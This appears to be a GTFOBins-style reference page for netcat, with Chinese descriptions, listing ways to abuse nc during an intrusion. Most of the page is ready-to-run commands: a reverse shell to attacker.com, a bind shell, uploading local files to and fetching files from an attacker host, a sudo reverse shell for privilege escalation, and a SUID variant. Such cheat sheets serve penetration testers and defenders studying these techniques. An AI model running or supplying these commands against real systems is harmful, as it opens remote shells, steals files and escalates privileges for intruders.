.. / nc

reverse-shell

向监听的端口发送反向shell，以打开远程网络访问。

• Run nc -l -p 12345 on the attacker box to receive the shell. This only works with netcat traditional.

  RHOST=attacker.com
  RPORT=12345
  nc -e /bin/sh $RHOST $RPORT
  

bind-shell

将shell绑定到本地端口，以允许远程网络访问。

• Run nc target.com 12345 on the attacker box to connect to the shell. This only works with netcat traditional.

  LPORT=12345
  nc -l -p $LPORT -e /bin/sh
  

file-upload

上传文件到外部。

• Send a local file via TCP. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file.

  RHOST=attacker.com
  RPORT=12345
  LFILE=要发送的文件
  nc $RHOST $RPORT < "$LFILE"
  

file-download

下载远程文件。

• Fetch a remote file via TCP. Run nc target.com 12345 < "要发送的文件" on the attacker box to send the file.

  LPORT=12345
  LFILE=file_to_save
  nc -l -p $LPORT > "$LFILE"
  

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

• Run nc -l -p 12345 on the attacker box to receive the shell. This only works with netcat traditional.

  RHOST=attacker.com
  RPORT=12345
  sudo nc -e /bin/sh $RHOST $RPORT
  

limited-suid

suid是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。

• Run nc -l -p 12345 on the attacker box to receive the shell. This only works with netcat traditional.

  RHOST=attacker.com
  RPORT=12345
  ./nc -e /bin/sh $RHOST $RPORT